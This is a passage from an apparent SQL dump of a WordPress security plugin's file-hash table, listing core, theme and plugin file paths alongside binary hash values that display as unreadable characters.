�','wp-admin/network/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���(���4�G�','��j/}Ӆ���\0E�S��̤\\Hg�#Z��._','',0,'?'),('�pJc#��bV���v�R�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',0,'�b4�\'��&��','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('���0j�l�S�K�','wp-includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iM,AJ���b\n\\�U','\r��ׯca\\]�ܚ��Šu�ra�{0sI����6','',0,'?'),('����ސ�q�ic�=�','wp-includes/class-wp-simplepie-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"u&��V�x���mj�0�','�Q�ߪ$(7�e�v�d�ʆ�O<-�XM��φ','',0,'?'),('��xF�E�*��,D�a�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�q������?�\"','�b�Y�(��\n��Q��;)+eE�)��\'vPa,','',0,'?'),('��2<�3��u!�]','wp-content/plugins/wordfence/js/wfselect2.min.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�������!�.���i','l�k}[�ZjA�.!��=+5�+�~q� 1','',0,'?'),('���ڧ9����4~�7z','wp-content/plugins/wordpress-seo/src/deprecated/frontend/frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*X�ڌ�?��x�x\0','�2X�~nt*���{ɸ\r�%��w�����IɅ�e�','',0,'?'),('��\Z$�������','wp-content/plugins/wp-cerber/assets/flags/nu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�#�Mh��?s','��^���{r地��]���89�٘SO�S�','',0,'?'),('��s�ՌQ��7o���','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Ufxy9�9��g4��','���E�F�j՗&\n��E��&J՟gWk.���T/','',0,'?'),('��_�Q�|�]����`\Z�','wp-includes/blocks/table/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','% ����l�7,��s�','q�Ah���W��LE��C�(�%�46m�+��(q','',0,'?'),('�«��-j=�u�N\\q\'','wp-admin/css/farbtastic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8)���}{��C�h2U','|A��L��Mb�x�d8X�jX.���^\n\Z�','',0,'?'),('���\\��`i�!�\\','wp-content/plugins/wp-smushit/app/assets/js/smush-clipboard.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ug�L�7v�7�ʰr�','�uOL��׶��ĻL�]�m/^\'n����','',0,'?'),('�ҰJ��?\n���$z�','wp-content/plugins/wordpress-seo/src/helpers/taxonomy-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|��}l�jT&+RdeU','��Y�y��}�����]͕�0ӽ�tM�;�|','',0,'?'),('�ԏ��R��!�&!','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-instructions.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$0��2���F��E+','5����|��m�EV��Z���ݘf�cMLJt��','',0,'?'),('�؍+;�^���I��][','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sr-Cyrl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����CqW��A9��L','�8����#{o.��:k�|�w�w!ݲQ��','',0,'?'),('��u�gk�D��E��K','wp-includes/blocks/query-pagination-numbers/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\~c���-�|1\Z�s�','O_���rU�x�(��!\n?կ��ǐ$�o','',0,'?'),('����fe\r�{Yg�Z�f;','wp-content/themes/hitmag/inc/kirki/CHANGELOG.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�[�ʺ4�å�b\Z�HS','��b�$�S���K�����84� ��g���t','',0,'?'),('��ᗏ�3�-��4�','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���ﳑI��5��<��','+?��m6�;)��C��g39\\�,x���̻�','',0,'?'),('�\"ڕK[@�G����9�','wp-admin/includes/class-wp-theme-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�(?�Z�����w���','�.	7��5zz�^��i��P\"�a|l�2�64Nw�N','',0,'?'),('�#��u0�c���}���','wp-includes/js/dist/i18n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d2�	MɆ���','[�~�5b�AN���n\Z#m)63�m�3O�l��sA','',0,'?'),('�$�Q�sP���R3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��9o;&�t���','C۞�`�)�t����f��K|j�����d�~','',0,'?'),('�3!9�=�6�ݡ','wp-admin/images/resize-rtl-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M���M�H�!�YA','�2��m�o��{�|�ny��˃�4(�φ�=�','',0,'?'),('�@�\0�\Z�������\Z�','wp-content/themes/hitmag/inc/customizer/assets/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�dԌ�g_Yu�z��','\0q�\\f-�����S�da�)i�N��X���妺�','',0,'?'),('�Ioo�Ԇ5nu�ѭ��H','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('�Zg�Ui1i�ƾ�x�=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�W�,��XEE�o�','l?���)&&������P��P$@�\\�/�','',0,'?'),('�^2^�T��:�mJ��:�','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UI�&�� ��I','�a�k*a\r�����tҷ� ��¾�^�J�O','',0,'?'),('�b�0݀>j�\"��G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�v�st�h�ڲ�C��N�','wp-content/plugins/wordpress-seo/src/presenters/googlebot-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ZKx�$Gi7�5q','�Y�`�mԿ�,ik�\\��ݜt*xE��ٙ;tM','',0,'?'),('���U���֫��o�V','wp-includes/wp-includes/js/api-request.js',0,'9����߿G7p6{�g','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('���n�Ioc�!���','wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�$Ȼ�����0bn','mS$^�|T�8�đ����=�ظ�l��F��`p�','',0,'?'),('���o<��e����','wp-content/plugins/redirection/locale/redirection-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�۷�\n�М��','%A��I[��TQ�Ʀ���K������}*w��,','',0,'?'),('�������e�5>X','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif',0,'��7I �1F�Gu�j^','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('��)ct�@�er��R`','wp-content/themes/hitmag/inc/kirki/controls/views/color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n5�s\Z���K�;-=j�','�x	,JX��Q��eM9Ӏ9�+�K�0.{a:cs�','',0,'?'),('��������u��j`T','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/LazyOpenStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nY�t�\"�D|�\r��','Sc>�ya\na�(E�N<��Lj/f7�\n��~-�I','',0,'?'),('����H{��.Q73l�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/es.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"\\-،.�]1B��K','�dF�@F4{*FZ��Mc&�~x2H��6��\r','',0,'?'),('��&V7s������c�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/archives/help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��yX�3��S���\"�','���y�~E.�m����vmt␘�Ӫ�L&�','',0,'?'),('��sC<�:���<�A�','wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:�Z{���5�o','���<�s�6��\0,	Ra�uhX��c���','',0,'?'),('�����@�j=�','wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nR�1G˕�\n���hc�','����� ��^b��V���l!�,�G�3/','',0,'?'),('��S�m9�ÙO,Z�','wp-content/plugins/wp-cerber/assets/flags/mm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h}IV6��Gb��1� ��','�\'&�+Nx�<�Ar�MRFP�D��9�W�','',0,'?'),('��h�c��f:(����','wp-includes/wp-includes/random_compat/error_polyfill.php',0,'X:,��t]7�=��Q��E','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('�)[\"J�H��|�jk��$','wp-admin/js/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�8g%��ځԧ �','U⨁��>�/o��ҘM\"�T���`��2','',0,'?'),('�8��g���-{\r6��','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-preset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lX��\\�|z6��‘�nP','_�����?pG+#H��d�4b�F��^��ov��','',0,'?'),('�?Fϸ����A��R1�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��ԏ�d0��lN&7+','^s\n�@G,�ږ\n;|3P	nԔ/\rzA�\"\nd','',0,'?'),('�JTV0D��oTA[@�','wp-admin/options-discussion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O(5zE�@Nm%�@ �','S�����)��s�[���x@���D�<+��','',0,'?'),('�W��S	x\n�젧0�\'','wp-content/themes/hitmag/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	�\'��*#x��-r','�^�k?+��g��E\0T�{\0�8/�~Ť�','',0,'?'),('�u}�*Wl�\0����\n','wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-modules-webfonts-async.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[u,��%HK���sI/','ᄚc����\\��.�g)�����KJg�A��k','',0,'?'),('����S�8M�C��>��','wp-includes/js/dist/block-serialization-default-parser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L|�rn0Ѽ�GL)�','?����E�L�_w�j�B��>�j���gO��5�','',0,'?'),('��L�@��V����k','wp-includes/wp-includes/images/toggle-arrow-2x.png',0,'F���\\����CDr�','F���\\����CDr�','-��N������7~@�}�_�=���V�_@A�','',0,'?'),('�������6��>�4�','wp-content/plugins/wordpress-seo/js/dist/externals/jed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�).�QYJ��\"w�H','���z�K��h8�[�A�w�x��qқ�','',0,'?'),('��8\Z�1\nȉ=\n��{�','wp-content/plugins/wordpress-seo/src/helpers/open-graph/values-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��?�&�|�\Zt��','��![��D�҉��ܞ�Y�]O�#*�`V','',0,'?'),('��G��Զ���O;\n','wp-content/plugins/wp-fastest-cache/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x)���A}~�f`','(@�2JGƜx�dӼ<R:S;p��9��','',0,'?'),('���Y:�\"���r\n��','wp-content/plugins/wp-smushit/app/assets/js/smush-media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���C�OK1*�HI�','`\r(=U�1�O6ɡ&\"�H�ۍ~{��dE��r�','',0,'?'),('���ٖ|;����','wp-content/plugins/wordpress-seo/src/services/health-check/myyoast-api-request-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�KL�q|�cV�O��','�w���n�N:x�q��E����ԡ�`','',0,'?'),('����S�h���S�%Tz�','wp-includes/js/mediaelement/wp-mediaelement.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('��Š�\Z�g����D�L�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/UriInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kPӊ��_4��','��1�b��ߟ��v�,�#G��l$fc�����','',0,'?'),('��������3���k�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GҷV���̒BD�Ҁ(�','��;#L��=nk��?~�2\\mt�KAϣK','',0,'?'),('���q�V�Y4�n���|','wp-includes/wp-includes/js/jquery/ui/datepicker.js',0,'�4P1,ٝ�`x����','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('���\"ܒ����nzD','wp-includes/SimplePie/Caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�8۝5:��?*)K','',0,'?'),('�ձ�Л��\\XJ��}�','wp-content/plugins/wp-smushit/_src/js/modules/admin-common.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4[�C��=C��.L�%�','��K��\"Z��D:\"��\r\'��GNv	M3`%þ�','',0,'?'),('��ˋ�_o!\'�u��r','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���VdЌX@q�ș��','S���تA���Ӥ�@5����|�~�?KBK9U','',0,'?'),('����;\n�7�ړ4t>J','wp-includes/blocks/post-date/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gA8MN��@��=��3g','�y��A1 �6���nf4ܪ���щȁ�(9�','',0,'?'),('��Z\nu�oK� ��T;e','wp-admin/images/list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��*�ӳ�S��','\\w��T[�=�b�aCk������;c���','',0,'?'),('�䏂Vܤ�c�Q��\'�3','wp-includes/blocks/comment-reply-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<0�}���׫�1��','�^���3�΋%J7I�nF)c\0�!6���Z\0�','',0,'?'),('���V�s�(tf���','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo-v4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3q��y&�V��y7S��','����e����j�7����E���c���,c]','',0,'?'),('��ll���x�L,7W�N�','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0J�.H[|�E3$d�','�\Z�z%����;�����o��n��m&������','',0,'?'),('�4)tk�l#�<��U�','wp-includes/block-patterns/query-grid-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/0�K�\0F��OK��M','�Q^D拜��dt�5���TG��)ˊh�`�e� ','',0,'?'),('���Uy/�*%��;','wp-admin/includes/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���T��+�d#y���','���i�o��T��a�\"�y��\0Y�]$u��','',0,'?'),('�\rE��U���̈́��','wp-includes/images/wpspin-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('�W���P旃^q�y�','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5X��P���K���','�S���P���A�_�l�W��2��?#_\rQ�x�','',0,'?'),('�I=bh�ʔGIkoba','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�լ{	�P|�WL�j','�V�@{��(x�h�1�~`�D�D�%����\r(��','',0,'?'),('�\'Arj�$��싶�Z','wp-content/plugins/wp-cerber/assets/flags/ua.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ń(�Y��Ph����','��k�6�\r�@܁���G�ȍ��T�m','',0,'?'),('�Fۺ��F朜���o�','wp-content/plugins/wp-cerber/assets/flags/ax.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�=���z���?','����?jAT�pY�u���+G<��!|�','',0,'?'),('�Ix�_W��^8��H','wp-content/plugins/wordpress-seo/js/dist/elementor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5X�!���̏�g�FF','�@�u)I��3��#�^]D�\ZN����;4','',0,'?'),('�NR,�J�*�̦G$i�','wp-content/plugins/wordpress-seo/admin/class-option-tabs-formatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�u����j','�&�5+�Ý%gD�Q�_]��\Z��dO���EGp','',0,'?'),('�V��>���L1ҕc�0','wp-content/plugins/wordpress-seo/js/dist/edit-page.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˊ}X���޾LK��','���c�m+�\rσk@��~Lm��s��0˽�)�','',0,'?'),('�h/͔��j�C�\0�n','wp-admin/includes/class-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�pT�0$�����.�','?�t�D~#͘��/X�#G/���Nf\\��͜gN','',0,'?'),('�x�W���2e�uv�L','wp-includes/customize/class-wp-customize-background-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1SDM�{KC��(��1�','M\n��K6e@���zM�d��׽Z%d	�Xҁ��','',0,'?'),('�6���?�^o�#�','wp-includes/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�󞮣Py�n','',0,'?'),('��\n��T�}����u','wp-content/themes/hitmag/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q/sj���70����&�','�y\rn\0\"����9�F|U��jj��۳�ʾ�','',0,'?'),('���R	�(�,	!)�Z','wp-content/plugins/wordfence/waf/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��6��~.���S�[','��\\\'�_F�u�C)CR\"(C�O�YW�!��)','',0,'?'),('��~G;a�+�����','wp-content/plugins/wp-smushit/app/assets/js/smush-admin.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L]�V�ƈ��Q�C�2','��x�$-���Om�MsO��0#��9�4���','',0,'?'),('�������݈3�+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����,0��Z%���','�g^�M���9=&*�M{��Xb�0*�u���','',0,'?'),('�����&@p����ɗ','wp-includes/js/dist/wordcount.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+��\\�BG���','Åף� 7/3�Z�(*��Ҋԓ�n���qM�J��','',0,'?'),('���ΦHc�^����)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\'�{=ͺ','���R������_f�W{*3����ݔ	�\"�/�','',0,'?'),('���0f|{�km�@��Y','wp-includes/wp-includes/images/media/video.png',0,'����u�h����q��','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('���?#o��v��','wp-includes/wp-includes/images/down_arrow-2x.gif',0,'�]����M�����f�','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('��r�,������^~��','wp-content/plugins/wp-cerber/assets/flags/my.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��r����V0�<\0�','�n��	~��6fjBٌ�k&�|�ް��[�F','',0,'?'),('��h�SĿQ���R��','wp-content/plugins/wordpress-seo/admin/import/class-import-plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�$omocg�]N(��','�\n�}�fX�Ĝb<E�o�.[<v6�1_�^','',0,'?'),('������sp���e�','wp-admin/includes/class-wp-ms-sites-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�f�\0W��w\Z̩','IRW��c-�ׯ�ݔ~���R�=8�`��cE','',0,'?'),('��(Bu�{��tZ܍','wp-content/plugins/redirection/locale/redirection-hr.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]\nwMY�gV�B��xQ','�aL;���!��>mM�R�H��T��,���3���','',0,'?'),('���@Pw�y���3�Ks','wp-includes/blocks/site-tagline/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�F��هs�[�mH�','��B\n×�ȹF)|6=�9G���>��n�`�u\Z','',0,'?'),('��	�ӭgȱ!n�P�','wp-includes/IXR/class-IXR-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���J�}��!�W��','Yw��1��v.�G3e�d��Ä��y`LR	]','',0,'?'),('���ʜ\\\"���z@*>�\Z','wp-includes/blocks/site-tagline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2oH\"ϵ8����zw ','�����h���9�DP\"��ϑ�hf��f%�','',0,'?'),('���\0䧝ܨ>�~��','wp-content/plugins/wp-smushit/app/views/cdn/meta-box-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�=ym��-X|��k','\'4k&��ޒ����%�t��=0��*�M�','',0,'?'),('�\nD���%a-�Iq��','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Regular.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��-�\\p�R�kI�','hX�ʀF^1��it8�O��qS�)��.�','',0,'?'),('�\ni_�a*���>�dnP','wp-includes/blocks/post-excerpt/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�1�,ͯeܒ���','�W޻i���7�5�^gDn~Q�\"5Q Wɟ�','',0,'?'),('�\rT���X�� ���[','wp-includes/php-compat/readonly.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','с��K�=���|��','�k��U7H��U�.ϕPm^�F��R45�����','',0,'?'),('�>5O�\n&��i#��g','wp-content/plugins/wp-cerber/assets/flags/nc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�ݦ<M��g�]','�`Gŗ#�&�5��7�X�,4s��q\\���','',0,'?'),('�(������]dJ\rl','wp-content/plugins/wp-cerber/cerber-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǜ�9Twu*�Ҳ�i','��v� %Kj��׹�\\J��/��௜՝mRb��X','',0,'?'),('�-1�8�;�T�/X�]','wp-admin/ms-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3����&S��7F76�','���,�$�y�n)R��Hg���h{�$��U��','',0,'?'),('�5�+�QW�C�!��j�T','wp-includes/wp-includes/rss-functions.php',0,' xr�6�2�\'�]�e�l#',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n�	��^�,','',0,'?'),('�8�Ø�/�J0Xy���','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qv��$v�}��]�','ya~N4�O���M_�D�0�^^]�<���4�','',0,'?'),('�<C14er�Խ��p�','wp-content/plugins/wordpress-seo/css/dist/tooltips-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�\Z82�	1�)y','���8�ӯ�\\��HU�ä.���3��Ə�sD�j','',0,'?'),('�B9g�M\Z�fKUh��Z�','wp-includes/wp-includes/js/swfupload/handlers.min.js',0,'j��ڙK�~q	����c=','j��ڙK�~q	����c=','�T򌿑�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�D��}U���#��:�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Uri.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lٗ�ݵr���lɋ&�','��췉P��d��f��z*�\".�ϱ��l/9�','',0,'?'),('�I�Y	v�1BI��\'�','wp-content/plugins/wordpress-seo/admin/class-yoast-plugin-conflict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o9 �X@��&�{Z�','=s���7ӱ�m#��Y1�~���(I�=\0-�h�gD','',0,'?'),('�j�<M�Dd����4m�','wp-admin/includes/ms-admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʊ_��\\�h\Z���E','�5G�F[P��r�T�\'xOQ���1�AN�Hd�w\\','',0,'?'),('�~��e]�>����w�@','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-sk_SK.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','20�$��ݭ��\'�\Z$','(����d�n����of�d��i�����G�]x�','',0,'?'),('��b6���Rjs��!��','wp-includes/wp-includes/sodium_compat/namespaced/File.php',0,']�m�w�/�\\�y5�',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('��\\ϥȈS\\y�%','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('���z]#Q�}��Pÿ','wp-content/plugins/wp-cerber/assets/flags/bh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ޒ��2�(;t�','/�֯��p�`��ł�����Ri_�K�','',0,'?'),('�����f1n����','wp-content/plugins/wordpress-seo/css/dist/select2/select2-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ـ\r\\�pi\Z��X��o','h�`�5�+�P\'i�IL�\Z8��b:;�)t�S. ','',0,'?'),('����SSq�\r��F�\'','wp-includes/wp-includes/css/dashicons.css',0,',J��/��n�R�~�',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('���=cei�ٍ+��','wp-content/plugins/wordpress-seo/src/config/migrations/20201216124002_ExpandIndexableIDColumnLengths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�=���|�p<�~*i','�1	�ۍCԧ\\��ũ�sژߟT�{G�> �u�','',0,'?'),('�����G���;9C','wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php',0,'ң-���с��','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�Ρ~�ߓ�:����eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ğ��c�h4\"���','����V��}X e~G[C�峆��5������','',0,'?'),('�ώzkks���k-\0F','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-rankmath.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�!zp+Ā(-�s/�','�`,x����!�7�]	��\\�?Ȃ�V/&˙�','',0,'?'),('��\n)۞,�\\�؅/�r','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',0,'�+o~��X��ݓ\0�','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),('���Λ��\\L�p���','wp-includes/blocks/comment-content/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uo24+�8p�פF1R�j','s�xj\'W��va���H��:!������D','',0,'?'),('���